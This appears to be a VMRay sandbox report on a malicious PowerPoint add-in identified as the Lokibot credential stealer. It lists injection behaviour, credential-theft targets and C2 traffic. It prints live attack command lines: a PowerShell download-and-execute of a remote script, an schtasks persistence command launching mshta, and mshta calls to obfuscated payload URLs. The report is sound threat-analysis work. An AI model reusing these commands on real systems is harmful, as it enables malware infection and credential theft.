DYNAMIC ANALYSIS REPORT #1559276
Classifications: Injector Spyware Dropper
Lokibot C2/Generic-A VBA:Amphitryon.217 MALICIOUS Threat Names: VB:Trojan.Valyria.4726 Gen:Variant.Razy.762033
Verdict Reason: -
Sample Type Powerpoint Document
Sample Name Request For Price quotation 1-6-2021.ppam
ID #577786
MD5 e4c3f31ecdafcda0fa615fdedfcc0513
SHA1 8d06efd6912296dfed548a4c0afcef355ef0f15a
SHA256 a782285f1b9ee7ceef60c568aabd624f8082d76eaf900f53d020f581146928bf
File Size 8.71 KB
Report Created 2021-06-01 12:09 (UTC+2)
Target Environment win10_64_th2_en_mso2016 | ms_office
X-Ray Vision for Malware - www.vmray.com 1 / 50 DYNAMIC ANALYSIS REPORT #1559276
OVERVIEW
VMRay Threat Identifiers (33 rules, 89 matches)
Score Category Operation Count Classification
5/5 Injection Writes into the memory of another running process 1 Injector
• (Process #7) powershell.exe modifies memory of (process #13) msbuild.exe.
5/5 Injection Writes into the memory of a process running from a created or modified executable 2 -
• (Process #7) powershell.exe modifies memory of (process #14) msbuild.exe.
• (Process #7) powershell.exe modifies memory of (process #15) msbuild.exe.
5/5 Injection Modifies control flow of another process 1 -
• (Process #7) powershell.exe alters context of (process #13) msbuild.exe.
5/5 Injection Modifies control flow of a process running from a created or modified executable 2 -
• (Process #7) powershell.exe alters context of (process #14) msbuild.exe.
• (Process #7) powershell.exe alters context of (process #15) msbuild.exe.
5/5 YARA Malicious content matched by YARA rules 2 Spyware
• Rule "Lokibot" from ruleset "Malware" has matched on a memory dump for (process #13) msbuild.exe.
• Rule "Lokibot" from ruleset "Malware" has matched on the function strings for (process #13) msbuild.exe.
5/5 Data Collection Tries to read cached credentials of various applications 1 Spyware
• Tries to read sensitive data of: KiTTY, Internet Explorer / Edge, Trojita, SecureFX, Pidgin, FAR Manager, Microsoft Outlook, LinasFTP, WinChips, FileZilla, Internet Explorer, NCH Fling, QtWeb Internet Browser, Opera Mail, IncrediMail, NCH Classic FTP, Pocomail, Total Commander, BlazeFTP, Bitvise SSH Client, FTP Navigator, PuTTY.
4/5 Network Connection Checks Internet connection 1 -
• (Process #2) mshta.exe checks network connectivity via API InternetGetConnectedState.
4/5 Execution Document tries to create process 4 -
• Document creates (process #2) mshta.exe.
• Document creates (process #13) msbuild.exe.
• Document creates (process #14) msbuild.exe.
• Document creates (process #15) msbuild.exe.
4/5 Obfuscation Reads from memory of another process 3 -
• (Process #7) powershell.exe reads from (process #13) msbuild.exe.
• (Process #7) powershell.exe reads from (process #14) msbuild.exe.
• (Process #7) powershell.exe reads from (process #15) msbuild.exe.
4/5 Discovery Reads installed applications 1 Spyware
• Reads installed programs by enumerating the SOFTWARE registry key.
4/5 Antivirus Malicious content was detected by heuristic scan 4 -
• Built-in AV detected the embedded file ooo.bin as "VBA:Amphitryon.217".
• Built-in AV detected the sample itself as "VBA:Amphitryon.217".
• Built-in AV detected the modified file c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\knz1hgrk\44[1].htm as "VB:Trojan.Valyria.4726".
• Built-in AV detected a memory dump of (process #13) msbuild.exe as "Gen:Variant.Razy.762033".
X-Ray Vision for Malware - www.vmray.com 2 / 50 DYNAMIC ANALYSIS REPORT #1559276
4/5 Execution Executes dropped PE file 1 Dropper
• Executes dropped file "C:\Users\RDhJ0CNFevzX\AppData\Roaming\9EDDE9\9BDC8A.exe".
4/5 Network Connection Performs DNS request 3 -
• (Process #7) powershell.exe resolves host name "ia801500.us.archive.org" to IP "207.241.228.150".
• (Process #13) msbuild.exe resolves host name "173.208.204.37" to IP "173.208.204.37".
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 • (Process #13) msbuild.exe resolves host name " 97 8B 8B 8F åððîèìñíïçñíïëñìèðñ94 8F 97 ð¬8F 9C 85 9D 94 ¼®¥®87 © 86 " to8D IP "-".
4/5 Network Connection Connects to remote host 2 -
• (Process #7) powershell.exe opens an outgoing TCP connection to host "207.241.228.150:443".
• (Process #13) msbuild.exe opens an outgoing TCP connection to host "173.208.204.37:80".
4/5 Network Connection Attempts to connect through HTTP 2 -
• (Process #13) msbuild.exe failed to connect to "http://173.208.204.37/k.php/SczbkxCQZQyVr".
• (Process #11) mshta.exe failed to connect to "http://1230948%[email protected]/p/44.html".
4/5 Network Connection Attempts to connect through HTTPS 4 -
• (Process #2) mshta.exe connects to "https://1230948%[email protected]/awkdhikhasd".
• (Process #2) mshta.exe connects to "https://l0mx.blogspot.com/p/44.html".
• (Process #2) mshta.exe connects to "https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fl0mx.blogspot.com%2Fp%2F44.html&type=blog&bpli=1".
• (Process #11) mshta.exe connects to "https://0v2x.blogspot.com/p/44.html".
4/5 Reputation Contacts known malicious URL 1 -
• Reputation analysis labels the URL "http://173.208.204.37/k.php/SczbkxCQZQyVr" which was contacted by (process #13) msbuild.exe as "C2/Generic-A".
4/5 Reputation Contacts known malicious IP address 1 -
• Reputation analysis labels the contacted IP address 173.208.204.37 as "C2/Generic-A".
4/5 Task Scheduling Schedules task 1 -
• Schedules task for command ""MsHtA"", to be triggered by Time. Task has been rescheduled by the analyzer.
4/5 Task Scheduling Schedules task via schtasks 1 -
• Schedules task """SECOTAKSA""" via the schtasks command line utility.
3/5 Discovery Reads system data 3 -
• (Process #13) msbuild.exe reads the cryptographic machine GUID from registry.
• (Process #14) msbuild.exe reads the cryptographic machine GUID from registry.
• (Process #15) msbuild.exe reads the cryptographic machine GUID from registry.
3/5 Anti Analysis Delays execution 1 -
• (Process #13) msbuild.exe has a thread which sleeps more than 5 minutes.
2/5 Anti Analysis Tries to detect debugger 1 -
• (Process #2) mshta.exe tries to detect a debugger via API "IsDebuggerPresent".
2/5 Data Collection Reads sensitive browser data 5 -
X-Ray Vision for Malware - www.vmray.com 3 / 50 DYNAMIC ANALYSIS REPORT #1559276
• (Process #2) mshta.exe tries to read sensitive data of web browser "Internet Explorer / Edge" by file.
• (Process #13) msbuild.exe tries to read sensitive data of web browser "QtWeb Internet Browser" by registry.
• (Process #13) msbuild.exe tries to read credentials of web browser "Internet Explorer" by reading from the system's credential vault.
• (Process #13) msbuild.exe tries to read sensitive data of web browser "Internet Explorer / Edge" by registry.
• (Process #11) mshta.exe tries to read sensitive data of web browser "Internet Explorer / Edge" by file.
2/5 Discovery Possibly does reconnaissance 14 -
• (Process #13) msbuild.exe tries to gather information about application "Mozilla Firefox" by registry.
• (Process #13) msbuild.exe tries to gather information about application "Comodo IceDragon" by registry.
• (Process #13) msbuild.exe tries to gather information about application "Safari" by registry.
• (Process #13) msbuild.exe tries to gather information about application "K-Meleon" by registry.
• (Process #13) msbuild.exe tries to gather information about application "Mozilla SeaMonkey" by registry.
• (Process #13) msbuild.exe tries to gather information about application "Mozilla Flock" by registry.
• (Process #13) msbuild.exe tries to gather information about application "Cyberfox" by registry.
• (Process #13) msbuild.exe tries to gather information about application "Total Commander" by registry.
• (Process #13) msbuild.exe tries to gather information about application "NetScape" by registry.
• (Process #13) msbuild.exe tries to gather information about application "Default Programs" by registry.
• (Process #13) msbuild.exe tries to gather information about application "Bitvise SSH Client" by registry.
• (Process #13) msbuild.exe tries to gather information about application "SecureFX" by registry.
• (Process #13) msbuild.exe tries to gather information about application "Postbox" by registry.
• (Process #13) msbuild.exe tries to gather information about application "Trojita" by registry.
2/5 Data Collection Reads sensitive application data 5 -
• (Process #13) msbuild.exe tries to read sensitive data of application "Pidgin" by file.
• (Process #13) msbuild.exe tries to read sensitive data of application "Bitvise SSH Client" by registry.
• (Process #13) msbuild.exe tries to read sensitive data of application "KiTTY" by registry.
• (Process #13) msbuild.exe tries to read sensitive data of application "PuTTY" by registry.
• (Process #13) msbuild.exe tries to read sensitive data of application "WinChips" by registry.
2/5 Data Collection Reads sensitive ftp data 10 -
• (Process #13) msbuild.exe tries to read sensitive data of ftp application "LinasFTP" by registry.
• (Process #13) msbuild.exe tries to read sensitive data of ftp application "FileZilla" by file.
• (Process #13) msbuild.exe tries to read sensitive data of ftp application "BlazeFTP" by file.
• (Process #13) msbuild.exe tries to read sensitive data of ftp application "BlazeFTP" by registry.
• (Process #13) msbuild.exe tries to read sensitive data of ftp application "Total Commander" by registry.
• (Process #13) msbuild.exe tries to read sensitive data of ftp application "FAR Manager" by registry.
• (Process #13) msbuild.exe tries to read sensitive data of ftp application "SecureFX" by registry.
• (Process #13) msbuild.exe tries to read sensitive data of ftp application "NCH Fling" by registry.
• (Process #13) msbuild.exe tries to read sensitive data of ftp application "NCH Classic FTP" by registry.
• (Process #13) msbuild.exe tries to read sensitive data of ftp application "FTP Navigator" by file.
2/5 Data Collection Reads sensitive mail data 5 -
• (Process #13) msbuild.exe tries to read sensitive data of mail application "Pocomail" by file.
• (Process #13) msbuild.exe tries to read sensitive data of mail application "IncrediMail" by registry.
• (Process #13) msbuild.exe tries to read sensitive data of mail application "Opera Mail" by file.
• (Process #13) msbuild.exe tries to read sensitive data of mail application "Microsoft Outlook" by registry.
• (Process #13) msbuild.exe tries to read sensitive data of mail application "Trojita" by registry.
2/5 Execution Office macro uses an execute function 1 -
• Office macro uses the run function.
2/5 Execution Executes macro on specific event 1 -
X-Ray Vision for Malware - www.vmray.com 4 / 50 DYNAMIC ANALYSIS REPORT #1559276
• Executes macro automatically on target "document" and event "open".
2/5 Execution Drops PE file 1 -
• Drops file C:\Users\RDhJ0CNFevzX\AppData\Roaming\9EDDE9\9BDC8A.exe.
1/5 Mutex Creates mutex 3 -
• (Process #13) msbuild.exe creates mutex with name "B7274519EDDE9BDC8AE51348".
• (Process #14) msbuild.exe creates mutex with name "B7274519EDDE9BDC8AE51348".
• (Process #15) msbuild.exe creates mutex with name "B7274519EDDE9BDC8AE51348".
1/5 Execution Contains suspicious Office macro 1 -
• Office document contains a suspicious VBA macro.
- Trusted Known clean file 12 -
• File "C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\INetCache\IE\3UNUC0QX\cookienotice[1].js" is a known clean file.
• File "C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\INetCache\IE\Q2CT0HTU\281434096-static_pages[1].css" is a known clean file.
• File "C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\INetCache\IE\3UNUC0QX\3101730221-analytics_autotrack[1].js" is a known clean file.
• File "C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\INetCache\IE\DZQW0FJC\maia[1].css" is a known clean file.
• File "c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\knz1hgrk\icon18_wrench_allbkg[1].png" is a known clean file.
• File "C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT" is a known clean file.
• File "c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\q2ct0htu\body_gradient_tile_light[1].png" is a known clean file.
• File "c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\knz1hgrk\gradients_light[1].png" is a known clean file.
• File "C:\Users\RDhJ0CNFevzX\AppData\Roaming\9EDDE9\9BDC8A.lck" is a known clean file.
• File "C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\INetCache\IE\DZQW0FJC\error[1]" is a known clean file.
• File "c: \users\rdhj0cnfevzx\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-1560258661-3990802383-1811730007-1000\3d3578a85286f88c6cd9d151e4412949_03845cb8-7441-4a2f- 8c0f-c90408af5778" is a known clean file.
• File "C:\Users\RDhJ0CNFevzX\AppData\Roaming\9EDDE9\9BDC8A.exe" is a known clean file.
Remarks
Anti-Sleep Triggered (0x0200000E): The overall sleep time of all monitored processes was truncated from "12 minutes, 12 seconds" to "20 seconds" to reveal dormant functionality.
Anti-Sleep Triggered (0x0200003A): A task was rescheduled ahead of time to reveal dormant functionality.
X-Ray Vision for Malware - www.vmray.com 5 / 50 DYNAMIC ANALYSIS REPORT #1559276
Mitre ATT&CK Matrix
Command Initial Privilege Defense Credential Lateral Execution Persistence Discovery Collection and Exfiltration Impact Access Escalation Evasion Access Movement Control
#T1119 ------Automated - - - Collection
#T1081 - - - - - Credentials ------in Files
#T1083 File and ------Directory Discovery
#T1005 Data ------from Local - - - System
#T1049 System ------Network - - - - - Connections Discovery
#T1082 System ------Information Discovery
#T1012 ------Query - - - - - Registry
#T1214 - - - - - Credentials ------in Registry
#T1217 Browser ------Bookmark Discovery
#T1003 - - - - - Credential ------Dumping
#T1064 #T1064 ------Scripting Scripting
#T1071 Standard ------Application - - Layer Protocol
#T1032 Standard ------Cryptographi c Protocol
#T1053 #T1053 #T1053 - Scheduled Scheduled Scheduled ------Task Task Task
X-Ray Vision for Malware - www.vmray.com 6 / 50 DYNAMIC ANALYSIS REPORT #1559276
Sample Information
ID 1559276
MD5 e4c3f31ecdafcda0fa615fdedfcc0513
SHA1 8d06efd6912296dfed548a4c0afcef355ef0f15a
SHA256 a782285f1b9ee7ceef60c568aabd624f8082d76eaf900f53d020f581146928bf
SSDeep 192:ZMA2JFXorP5iWztBbksOzrh01pTUd6s7y:QJYhiEB4/V0XG6s+
ImpHash
Filename Request For Price quotation 1-6-2021.ppam
File Size 8.71 KB
Sample Type Powerpoint Document
Has Macros
Analysis Information
Creation Time 2021-06-01 12:09 (UTC+2)
Analysis Duration 00:04:11
Termination Reason Timeout
Number of Monitored Processes 9
Execution Successfull False
Reputation Analysis Enabled
WHOIS Enabled
Built-in AV Enabled
Built-in AV Applied On Sample Files, PCAP File, Downloaded Files, Dropped Files, Modified Files, Memory Dumps, Embedded Files
Number of AV Matches 4
YARA Enabled
YARA Applied On Sample Files, PCAP File, Downloaded Files, Dropped Files, Modified Files, Memory Dumps, Embedded Files
Number of YARA Matches 2
X-Ray Vision for Malware - www.vmray.com 7 / 50 DYNAMIC ANALYSIS REPORT #1559276
X-Ray Vision for Malware - www.vmray.com 8 / 50 DYNAMIC ANALYSIS REPORT #1559276
Screenshots trunkated.
X-Ray Vision for Malware - www.vmray.com 9 / 50 DYNAMIC ANALYSIS REPORT #1559276
NETWORK
General
10.75 KB total sent
1049.08 KB total received
2 ports 80, 443
8 contacted IP addresses
71 URLs extracted
5 files downloaded
0 malicious hosts detected
DNS
31 DNS requests for 7 domains
1 nameservers contacted
12 total requests returned errors
HTTP/S
7 URLs contacted, 4 servers
23 sessions, 10.32 KB sent, 1048.93 KB recivied
DNS Requests
Type Hostname Response Code Resolved IPs CNames Verdict
67.199.248.14, A bitly.com NoError N/A 67.199.248.15
l0mx.blogspot.com, blogspot.l.googleusercontent A blogspot.l.googleusercontent NoError 142.250.186.129 N/A .com .com
A fonts.googleapis.com NoError 142.250.186.138 N/A
A ia801500.us.archive.org NoError 207.241.228.150 N/A
0v2x.blogspot.com, blogspot.l.googleusercontent A blogspot.l.googleusercontent NoError 142.250.186.129 N/A .com .com
173.208.204.37 173.208.204.37 N/A
00 00 00 00 00 00 97 8B 8B 8F åððîèìñíïçñíïëñìèðñ94 8F 00 00 00 00 00 00 00 00 00 N/A 97 8F ð¬ 9C 85 9D 94 87 ¼®¥®©86 8D
HTTP Requests
Method URL Dest. IP Dest. Port Status Code Response Size Verdict
http:// 1230948%1230948@0v - 0 bytes N/A 2x.blogspot.com/p/ 44.html\
http:// 1230948%1230948@0v - 0 bytes N/A 2x.blogspot.com/p/ 44.html
http://173.208.204.37/ POST 0 bytes N/A k.php/SczbkxCQZQyVr
http:// GET 0v2x.blogspot.com/p/ 0 bytes N/A 44.html
X-Ray Vision for Malware - www.vmray.com 10 / 50 DYNAMIC ANALYSIS REPORT #1559276
Method URL Dest. IP Dest. Port Status Code Response Size Verdict
http://cpanel.com/? utm_source=cpanelwhm &utm_medium=cplogo& GET 0 bytes N/A utm_content=logolink&u tm_campaign=404referr al
//fonts.googleapis.com/ GET css?family=Open+Sans: 0 bytes N/A 300
//www.google.com/css/ GET 0 bytes N/A maia.css
//www.blogger.com/ GET 0 bytes N/A content.g
https:// - 1230948%1230948@bit 0 bytes N/A ly.com/awkdhikhasd
https:// ia801500.us.archive.org/ - 0/items/ 0 bytes N/A 1_20210527_20210527/ 1.txt
https:// GET 0v2x.blogspot.com/p/ 0 bytes N/A 44.html
https:// www.blogger.com/static/ GET 0 bytes N/A v1/widgets/115981500- css_bundle_v2.css
https:// GET l0mx.blogspot.com/ 0 bytes N/A favicon.ico
https:// GET l0mx.blogspot.com/p/ 0 bytes N/A 44.html
https:// www.blogger.com/dyn- css/authorization.css? GET targetBlogID=43384304 0 bytes N/A 58218760041&zx=7daa 74e6-a63d-414d- b329-4c3a73b1266b
https:// GET 0 bytes N/A l0mx.blogspot.com/
GET https://www.blogger.com 0 bytes N/A
https:// www.blogger.com/ blogin.g? GET 0 bytes N/A blogspotURL=https:// l0mx.blogspot.com/p/ 44.html&type=blog
https:// resources.blogblog.com/ GET img/ 0 bytes N/A icon18_wrench_allbkg.p ng
https:// www.blogger.com/static/ GET 0 bytes N/A v1/widgets/4154767893- widgets.js
https:// www.blogger.com/static/ GET 0 bytes N/A v1/v-css/281434096- static_pages.css
https://www.google.de/ GET intl/de/about/products? 0 bytes N/A tab=jh
https:// myaccount.google.com/ GET ? 0 bytes N/A utm_source=OGB&tab=j k&utm_medium=app
X-Ray Vision for Malware - www.vmray.com 11 / 50 DYNAMIC ANALYSIS REPORT #1559276
Method URL Dest. IP Dest. Port Status Code Response Size Verdict
https://www.google.de/ GET 0 bytes N/A webhp?tab=jw
https://maps.google.de/ GET 0 bytes N/A maps?hl=de&tab=jl
https:// GET www.youtube.com/? 0 bytes N/A gl=DE&tab=j1
https:// GET play.google.com/? 0 bytes N/A hl=de&tab=j8
https:// GET news.google.com/? 0 bytes N/A tab=jn
https://mail.google.com/ GET 0 bytes N/A mail/?tab=jm
https:// GET meet.google.com/? 0 bytes N/A hs=197
GET https://chat.google.com/ 0 bytes N/A
https:// GET contacts.google.com/? 0 bytes N/A hl=de&tab=jC
https:// GET drive.google.com/? 0 bytes N/A tab=jo
https:// GET calendar.google.com/ 0 bytes N/A calendar?tab=jc
https:// GET translate.google.de/? 0 bytes N/A hl=de&tab=jT
https:// GET photos.google.com/? 0 bytes N/A tab=jq&pageId=none
https://duo.google.com/? GET 0 bytes N/A usp=duo_ald
https://www.google.com/ chrome/? brand=CHZO&utm_sour ce=google.com&utm_m edium=desktop-app- GET launcher&utm_campaig 0 bytes N/A n=desktop-app- launcher&utm_content= chrome- logo&utm_keyword=CH ZO
https://www.google.de/ shopping? GET 0 bytes N/A hl=de&source=og&tab=j f
https://docs.google.com/ GET document/? 0 bytes N/A usp=docs_alc
https://docs.google.com/ GET spreadsheets/? 0 bytes N/A usp=sheets_alc
https://docs.google.com/ GET presentation/? 0 bytes N/A usp=slides_alc
https:// GET books.google.de/? 0 bytes N/A hl=de&tab=jp
https:// GET www.blogger.com/? 0 bytes N/A tab=jj
https:// GET 0 bytes N/A hangouts.google.com/
X-Ray Vision for Malware - www.vmray.com 12 / 50 DYNAMIC ANALYSIS REPORT #1559276
Method URL Dest. IP Dest. Port Status Code Response Size Verdict
GET https://keep.google.com/ 0 bytes N/A
https:// GET jamboard.google.com/? 0 bytes N/A usp=jam_ald
https:// GET 0 bytes N/A earth.google.com/web/
https://www.google.de/ GET 0 bytes N/A save
https:// artsandculture.google.co m/? GET 0 bytes N/A hl=de&utm_source=ogs. google.com&utm_mediu m=referral
https://ads.google.com/ home/?subid=ww-ww- GET et-g-aw-a- 0 bytes N/A vasquette_ads_cons_1! o2
https:// GET 0 bytes N/A podcasts.google.com/
https:// GET 0 bytes N/A stadia.google.com/
https://www.google.com/ GET 0 bytes N/A travel/?dest_src=al
https://docs.google.com/ GET 0 bytes N/A forms/?usp=forms_alc
https:// accounts.google.com/ ServiceLogin? GET service=blogger&contin 0 bytes N/A ue=https:// www.blogger.com/ blogger.g&ec=GAZAHg
https:// l0mx.blogspot.com/p/ 44.html? GET interstitial=ABqL8_gvbP 0 bytes N/A XHD5jpqumPTlQCtBQg p8XaSPp4fUgU9ZuwTw jaS0cE_SN8DFw00XdM
https:// GET www.blogger.com/go/ 0 bytes N/A helpcenter
https:// GET www.blogger.com/go/ 0 bytes N/A discuss
https:// GET www.blogger.com/go/ 0 bytes N/A tutorials
https:// GET www.blogger.com/go/ 0 bytes N/A buzz
https:// GET www.blogger.com/go/ 0 bytes N/A devapi
https:// GET www.blogger.com/go/ 0 bytes N/A devforum
https:// GET www.blogger.com/go/ 0 bytes N/A terms
https:// GET www.blogger.com/go/ 0 bytes N/A privacy
https:// GET www.blogger.com/go/ 0 bytes N/A contentpolicy
X-Ray Vision for Malware - www.vmray.com 13 / 50 DYNAMIC ANALYSIS REPORT #1559276
Method URL Dest. IP Dest. Port Status Code Response Size Verdict
https://www.google.de/ GET 0 bytes N/A contact/impressum.html
https://www.google- GET analytics.com/ 0 bytes N/A analytics.js
https:// www.blogger.com/static/ GET 0 bytes N/A v1/jsbin/3101730221- analytics_autotrack.js
https:// GET 0v2x.blogspot.com/ 0 bytes N/A favicon.ico
https:// www.blogger.com/dyn- css/authorization.css? GET targetBlogID=15993131 0 bytes N/A 25304121436&zx=631e 10cf-0d71-470c- af57-797d37f6668c
https:// GET 0 bytes N/A 0v2x.blogspot.com/
https:// www.blogger.com/ blogin.g? GET 0 bytes N/A blogspotURL=https:// 0v2x.blogspot.com/p/ 44.html&type=blog
https:// www.blogger.com/ blogin.g? GET blogspotURL=https%3A 0 bytes N/A %2F%2Fl0mx.blogspot. com%2Fp%2F44.html&t ype=blog&bpli=1
X-Ray Vision for Malware - www.vmray.com 14 / 50 DYNAMIC ANALYSIS REPORT #1559276
BEHAVIOR
Process Graph
#11 Child Process mshta.exe
#3 Modify Memory svchost.exe Modify Control Flow #13 msbuild.exe RPC Server Child Process
#1 Child Process #2 Child Process #7 Sample Start Modify Memory powerpnt.exe mshta.exe powershell.exe Child Process Modify Control Flow #14 msbuild.exe Child Process
#9 Modify Memory schtasks.exe
Modify Control Flow #15 msbuild.exe
Child Process
X-Ray Vision for Malware - www.vmray.com 15 / 50 DYNAMIC ANALYSIS REPORT #1559276
Process #1: powerpnt.exe
ID 1
Filename c:\program files (x86)\microsoft office\root\office16\powerpnt.exe
Command Line "C:\Program Files (x86)\Microsoft Office\Root\Office16\POWERPNT.EXE"
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 103724, Reason: Analysis Target
Unmonitor End Time End Time: 356065, Reason: Terminated by Timeout
Monitor Duration 252.34s
Return Code Unknown
PID 4604
Parent PID 2104
Bitness 32 Bit
Host Behavior
Type Count
Module 3
Keyboard 6
X-Ray Vision for Malware - www.vmray.com 16 / 50 DYNAMIC ANALYSIS REPORT #1559276
Process #2: mshta.exe
ID 2
Filename c:\windows\syswow64\mshta.exe
Command Line C:\Windows\SysWOW64\mshta.exe https://1230948%[email protected]/awkdhikhasd
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 145650, Reason: Child Process
Unmonitor End Time End Time: 313171, Reason: Terminated
Monitor Duration 167.52s
Return Code 0
PID 4640
Parent PID 4604
Bitness 32 Bit
Dropped Files (9)
Filename File Size SHA256 YARA Match
d172d750493be64a7ed84dec1dd2a0d787ba - 475 bytes 42f78bc694b0858f152c52b6620b
C: b1313dd95eaf63f33f86f72f09e2ecd700d1115 \Users\RDhJ0CNFevzX\AppData\Local\Micro 47.97 KB 9a8693210c37470fcb84038f7 soft\Internet Explorer\MSIMGSIZ.DAT
0fdcb4746995f0d5240e5ec11370cb950722a - 95 bytes 894f3cff4118aa68ccc92010edd
ecb30886406e3f776ff7bc3834de849944471e - 403 bytes 626ff148bed2fa389d02866044
efea3840519cec6828835e879cb29cf9c45d7f - 147.90 KB 45a8e920852b9ee2129bcfeb95
cbad27c35fbc84e2da4280476adeb197566db - 1.13 KB 2750b8b4a79eb7e872db8d8acb7
C: \Users\RDhJ0CNFevzX\AppData\Local\Micro 7990e703ae060c241eba6257d963af2ecf9c6f 3.17 KB soft\Windows\INetCache\IE\DZQW0FJC\error 3fbdb57264c1d48dda8171e754 [1]
82f8ca6d30d6f9c3263743cfe1e15f47a4c268 - 98 bytes d464a7c18bc6b69dd97e12fb57
4c3ea140e5dafcf0a6714eb5d4b0991e63854 - 195 bytes 66db3e47d2f3712dd6e5a2e281d
Host Behavior
Type Count
Module 212
System 5607
Registry 14
Environment 4
- 3
- 10
Keyboard 9
File 71
Window 28
COM 55
X-Ray Vision for Malware - www.vmray.com 17 / 50 DYNAMIC ANALYSIS REPORT #1559276
Type Count
- 29
Process 1
Mutex 2
- 1
Network Behavior
Type Count
HTTPS 4
TCP 4
X-Ray Vision for Malware - www.vmray.com 18 / 50 DYNAMIC ANALYSIS REPORT #1559276
Process #3: svchost.exe
ID 3
Filename c:\windows\system32\svchost.exe
Command Line C:\Windows\system32\svchost.exe -k netsvcs
Initial Working Directory C:\Windows\system32\
Monitor Start Time Start Time: 171788, Reason: RPC Server
Unmonitor End Time End Time: 356065, Reason: Terminated by Timeout
Monitor Duration 184.28s
Return Code Unknown
PID 828
Parent PID 540
Bitness 64 Bit
X-Ray Vision for Malware - www.vmray.com 19 / 50 DYNAMIC ANALYSIS REPORT #1559276
Process #7: powershell.exe
ID 7
Filename c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h i'E'x(iwr('https://ia801500.us.archive.org/0/items/1_20210527_202...... /0/items/ Command Line 1_20210527_20210527/1.txt') -useB);i'E'x(iwr('https://ia801500.us.archive.org/0/items/1_20210527_20210527/1.txt') -useB);
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 182349, Reason: Child Process
Unmonitor End Time End Time: 342044, Reason: Terminated
Monitor Duration 159.69s
Return Code 0
PID 4188
Parent PID 4640
Bitness 32 Bit
Host Behavior
Type Count
Module 10
File 520
Environment 59
Registry 59
Process 3
Mutex 2
- 37
System 17
- 9
- 24
Network Behavior
Type Count
DNS 1
TCP 3
X-Ray Vision for Malware - www.vmray.com 20 / 50 DYNAMIC ANALYSIS REPORT #1559276
Process #9: schtasks.exe
ID 9
Filename c:\windows\syswow64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""SECOTAKSA"" /F /tr ""\""MsHtA""\""http:// Command Line 1230948%[email protected]/p/44.html\""
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 183491, Reason: Child Process
Unmonitor End Time End Time: 201474, Reason: Terminated
Monitor Duration 17.98s
Return Code 0
PID 112
Parent PID 4640
Bitness 32 Bit
Host Behavior
Type Count
Module 3
System 3
COM 1
File 6
X-Ray Vision for Malware - www.vmray.com 21 / 50 DYNAMIC ANALYSIS REPORT #1559276
Process #11: mshta.exe
ID 11
Filename c:\windows\system32\mshta.exe
Command Line MsHtA "http://1230948%[email protected]/p/44.html"
Initial Working Directory C:\Windows\system32\
Monitor Start Time Start Time: 206144, Reason: Child Process
Unmonitor End Time End Time: 356065, Reason: Terminated by Timeout
Monitor Duration 149.92s
Return Code Unknown
PID 1420
Parent PID 828
Bitness 64 Bit
Host Behavior
Type Count
System 849
Environment 1
- 2
Registry 6
Module 84
- 5
Keyboard 3
File 13
Window 6
COM 3
- 14
Network Behavior
Type Count
HTTP 2
HTTPS 1
TCP 1
X-Ray Vision for Malware - www.vmray.com 22 / 50 DYNAMIC ANALYSIS REPORT #1559276
Process #13: msbuild.exe
ID 13
Filename c:\windows\microsoft.net\framework\v4.0.30319\msbuild.exe
Command Line #cmd
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 312428, Reason: Child Process
Unmonitor End Time End Time: 356065, Reason: Terminated by Timeout
Monitor Duration 43.64s
Return Code Unknown
PID 4908
Parent PID 4188
Bitness 32 Bit
Injection Information (7)
Injection Type Source Process Source / Target TID Address / Name Size Success Count
#7: c: \windows\syswow64\win Modify Memory 0x1034 0x400000(4194304) 0x400 1 dowspowershell\v1.0\po wershell.exe
#7: c: \windows\syswow64\win Modify Memory 0x1034 0x401000(4198400) 0x13800 1 dowspowershell\v1.0\po wershell.exe
#7: c: \windows\syswow64\win Modify Memory 0x1034 0x415000(4280320) 0x4200 1 dowspowershell\v1.0\po wershell.exe
#7: c: \windows\syswow64\win Modify Memory 0x1034 0x41a000(4300800) 0x200 1 dowspowershell\v1.0\po wershell.exe
#7: c: \windows\syswow64\win Modify Memory 0x1034 0x4a0000(4849664) 0x2000 1 dowspowershell\v1.0\po wershell.exe
#7: c: \windows\syswow64\win Modify Memory 0x1034 0x3c4008(3948552) 0x4 1 dowspowershell\v1.0\po wershell.exe
#7: c: \windows\syswow64\win Modify Control Flow 0x1034 / 0x1318 - 1 dowspowershell\v1.0\po wershell.exe
Dropped Files (5)
Filename File Size SHA256 YARA Match
e641ff8107a4197ded9f558d1891e716811e9a - 53 bytes 7f109f14e876f5a8394844dc34
C: 859ffdca62ee0971821a4b2dedfc023d0f9a02 \Users\RDhJ0CNFevzX\AppData\Roaming\9 4 bytes 1391b5ac336ddb49d53d28330e EDDE9\9BDC8A.hdb
C: 6b86b273ff34fce19d6b804eff5a3f5747ada4e \Users\RDhJ0CNFevzX\AppData\Roaming\9 1 bytes aa22f1d49c01e52ddb7875b4b EDDE9\9BDC8A.lck
353fd628b7f6e7d426e5d6a27d1bc3ac22fa7f - 53 bytes 812e7594cf2ec5ca1175785b50
